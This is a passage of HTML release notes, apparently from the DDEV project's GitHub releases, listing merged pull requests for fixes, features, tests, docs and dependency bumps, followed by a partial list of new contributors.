<li>feat: support add-ons written primarily in PHP, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3077187507" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7316" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7316/hovercard" href="https://github.com/ddev/ddev/issues/7316">#7316</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3316977566" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7523" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7523/hovercard" href="https://github.com/ddev/ddev/pull/7523">#7523</a></li>
<li>docs: Fix blog link in main nav by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mxr576/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mxr576">@mxr576</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3355892005" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7566" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7566/hovercard" href="https://github.com/ddev/ddev/pull/7566">#7566</a></li>
<li>test: jq is not available on Windows, use docker run -i ddev/ddev-utilities by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3355436775" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7564" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7564/hovercard" href="https://github.com/ddev/ddev/pull/7564">#7564</a></li>
<li>test: Skip TestComposerCreateProjectCmd on Windows where it hangs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3355508365" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7565" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7565/hovercard" href="https://github.com/ddev/ddev/pull/7565">#7565</a></li>
<li>fix(magerun): use stable branch for autocompletion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3356302318" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7567" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7567/hovercard" href="https://github.com/ddev/ddev/pull/7567">#7567</a></li>
<li>test(buildkite): do better cleaning up volumes before running test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3356695008" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7568" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7568/hovercard" href="https://github.com/ddev/ddev/pull/7568">#7568</a></li>
<li>test(buildkite): Minor fixup for buildkite timeout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3361679482" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7571" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7571/hovercard" href="https://github.com/ddev/ddev/pull/7571">#7571</a></li>
<li>chore(mkdocs): disable privacy plugin for local builds, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2213591467" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6027" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/6027/hovercard" href="https://github.com/ddev/ddev/pull/6027">#6027</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3359866759" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7569" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7569/hovercard" href="https://github.com/ddev/ddev/pull/7569">#7569</a></li>
<li>build(deps): bump 1password/load-secrets-action from 2 to 3 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3354194100" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7561" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7561/hovercard" href="https://github.com/ddev/ddev/pull/7561">#7561</a></li>
<li>build(dbserver): switch to <code>bitnamilegacy/mysql</code> for MySQL 8.0 and 8.4, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3249166670" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7470" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7470/hovercard" href="https://github.com/ddev/ddev/issues/7470">#7470</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3360019241" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7570" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7570/hovercard" href="https://github.com/ddev/ddev/pull/7570">#7570</a></li>
<li>build: go back to stable spf/cobra, reverting <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3222958615" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7445" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7445/hovercard" href="https://github.com/ddev/ddev/pull/7445">#7445</a>, bump go-viper/mapstructure, replaces <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3342049037" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7547" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7547/hovercard" href="https://github.com/ddev/ddev/pull/7547">#7547</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3372983733" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7580" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7580/hovercard" href="https://github.com/ddev/ddev/pull/7580">#7580</a></li>
<li>fix: add missing ephemeral port handling to xhgui service, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3351453847" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7557" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7557/hovercard" href="https://github.com/ddev/ddev/issues/7557">#7557</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3353596255" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7560" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7560/hovercard" href="https://github.com/ddev/ddev/pull/7560">#7560</a></li>
<li>fix(provider): add warnings for empty pull/push, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368663008" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7576" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7576/hovercard" href="https://github.com/ddev/ddev/issues/7576">#7576</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3372202833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7578" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7578/hovercard" href="https://github.com/ddev/ddev/pull/7578">#7578</a></li>
<li>fix: report MariaDB/MySQL/PostgreSQL client install failures and refactor timeout logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339184632" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7542" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7542/hovercard" href="https://github.com/ddev/ddev/pull/7542">#7542</a></li>
<li>docs(provider): soften language about use of provider push by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3373934430" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7581" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7581/hovercard" href="https://github.com/ddev/ddev/pull/7581">#7581</a></li>
<li>fix: cache <code>WarningOnce</code>, reduce <code>NewApp</code> calls, handle <code>GetDockerClient</code> errors, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3250075018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7472" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7472/hovercard" href="https://github.com/ddev/ddev/issues/7472">#7472</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3364607462" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7574" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7574/hovercard" href="https://github.com/ddev/ddev/pull/7574">#7574</a></li>
<li>fix: set 20m download timeout and retry with doubled timeout on "context deadline exceeded", fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3066708425" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7298" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7298/hovercard" href="https://github.com/ddev/ddev/issues/7298">#7298</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368090739" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7575" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7575/hovercard" href="https://github.com/ddev/ddev/pull/7575">#7575</a></li>
<li>build: gitignore/CLAUDE.md nitpicks [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3384402242" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7588" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7588/hovercard" href="https://github.com/ddev/ddev/pull/7588">#7588</a></li>
<li>refactor: add dockerManager singleton, split dockerutils.go, add IsWindows/IsMacOS/IsLinux by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3381116582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7587" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7587/hovercard" href="https://github.com/ddev/ddev/pull/7587">#7587</a></li>
<li>test(buildkite): buildkite can take a few minutes to pull new images [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3390957971" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7596" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7596/hovercard" href="https://github.com/ddev/ddev/pull/7596">#7596</a></li>
<li>build(deps): bump actions/setup-go from 5 to 6 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3394615826" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7602" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7602/hovercard" href="https://github.com/ddev/ddev/pull/7602">#7602</a></li>
<li>build(deps): bump actions/setup-python from 5.6.0 to 6.0.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3394615417" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7601" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7601/hovercard" href="https://github.com/ddev/ddev/pull/7601">#7601</a></li>
<li>build(deps): bump actions/github-script from 7 to 8 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3394615234" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7600" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7600/hovercard" href="https://github.com/ddev/ddev/pull/7600">#7600</a></li>
<li>feat: provide <code>host.docker.internal</code> for all services, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3332171904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7537" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7537/hovercard" href="https://github.com/ddev/ddev/issues/7537">#7537</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3362857741" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7572" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7572/hovercard" href="https://github.com/ddev/ddev/pull/7572">#7572</a></li>
<li>test(xhgui): add more retries for GetLocalHTTPResponse, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339236069" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7543/hovercard" href="https://github.com/ddev/ddev/pull/7543">#7543</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3397807873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7606" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7606/hovercard" href="https://github.com/ddev/ddev/pull/7606">#7606</a></li>
<li>feat(add-ons): add-on dependencies should be automatically downloaded, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1898894253" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5337" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5337/hovercard" href="https://github.com/ddev/ddev/issues/5337">#5337</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3379994018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7586" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7586/hovercard" href="https://github.com/ddev/ddev/pull/7586">#7586</a></li>
<li>test: re-enable no-bind-mounts test since it's used some places [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3387593660" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7591" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7591/hovercard" href="https://github.com/ddev/ddev/pull/7591">#7591</a></li>
<li>fix(laravel): don't edit database config in <code>.env</code> when there's no database by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3378833304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7584" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7584/hovercard" href="https://github.com/ddev/ddev/pull/7584">#7584</a></li>
<li>feat: use DDEV_GITHUB_TOKEN as bearer token for downloads from GitHub, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1859168050" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5285" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5285/hovercard" href="https://github.com/ddev/ddev/issues/5285">#5285</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3391673483" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7598" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7598/hovercard" href="https://github.com/ddev/ddev/pull/7598">#7598</a></li>
<li>refactor(add-ons): dependencies in add-ons must be canonical, can't be relative or absolute by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3407387911" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7613" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7613/hovercard" href="https://github.com/ddev/ddev/pull/7613">#7613</a></li>
<li>docs: fix typo in documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hockdudu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hockdudu">@hockdudu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411404301" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7618" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7618/hovercard" href="https://github.com/ddev/ddev/pull/7618">#7618</a></li>
<li>fix(ddev-php-base): Remove php8.4-obsolete config, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3410137550" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7616" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7616/hovercard" href="https://github.com/ddev/ddev/issues/7616">#7616</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411153917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7617" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7617/hovercard" href="https://github.com/ddev/ddev/pull/7617">#7617</a></li>
<li>docs: remove Prerequisite section by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitressa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitressa">@gitressa</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414954874" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7621" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7621/hovercard" href="https://github.com/ddev/ddev/pull/7621">#7621</a></li>
<li>docs: clarify comments in the Drupal 10 and 11 quickstarts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3413872313" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7619" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7619/hovercard" href="https://github.com/ddev/ddev/issues/7619">#7619</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brookemahoney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brookemahoney">@brookemahoney</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414204022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7620" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7620/hovercard" href="https://github.com/ddev/ddev/pull/7620">#7620</a></li>
<li>feat: add <code>ddev npx</code> command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dragonwize/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dragonwize">@dragonwize</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3391957933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7599" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7599/hovercard" href="https://github.com/ddev/ddev/pull/7599">#7599</a></li>
<li>docs: offer help on out-of-disk-space warning, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3387649991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7592" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7592/hovercard" href="https://github.com/ddev/ddev/issues/7592">#7592</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3417866933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7622" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7622/hovercard" href="https://github.com/ddev/ddev/pull/7622">#7622</a></li>
<li>build: bump <code>docker-compose</code> to v2.39.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419613881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7623" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7623/hovercard" href="https://github.com/ddev/ddev/pull/7623">#7623</a></li>
<li>docs: add GitHub Copilot instructions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419896811" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7626" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7626/hovercard" href="https://github.com/ddev/ddev/issues/7626">#7626</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419896929" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7627" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7627/hovercard" href="https://github.com/ddev/ddev/pull/7627">#7627</a></li>
<li>build: bump Docker images to v1.24.8 for release, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320030923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7526" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7526/hovercard" href="https://github.com/ddev/ddev/issues/7526">#7526</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3422665433" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7628" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7628/hovercard" href="https://github.com/ddev/ddev/pull/7628">#7628</a></li>
<li>fix: don't show timeout suggestion for ddev-router and ddev-ssh-agent on <code>ddev start</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3425827964" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7633" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7633/hovercard" href="https://github.com/ddev/ddev/pull/7633">#7633</a></li>
<li>chore: update <code>schema.json</code>, <code>global_config.yaml</code>, <code>config.yaml</code> templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3426016207" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7634" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7634/hovercard" href="https://github.com/ddev/ddev/pull/7634">#7634</a></li>
<li>feat: improve <code>ddev debug test</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3426408977" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7636" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7636/hovercard" href="https://github.com/ddev/ddev/pull/7636">#7636</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adiati98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adiati98">@adiati98</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3254098957" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7476/hovercard" href="https://github.com/ddev/ddev/pull/7476">#7476</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhuf">@dhuf</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3260387579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7482" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7482/hovercard" href="https://github.com/ddev/ddev/pull/7482">#7482</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/punkrock34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/punkrock34">@punkrock34</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3175289326" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7399" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7399/hovercard" href="https://github.com/ddev/ddev/pull/7399">#7399</a></li>
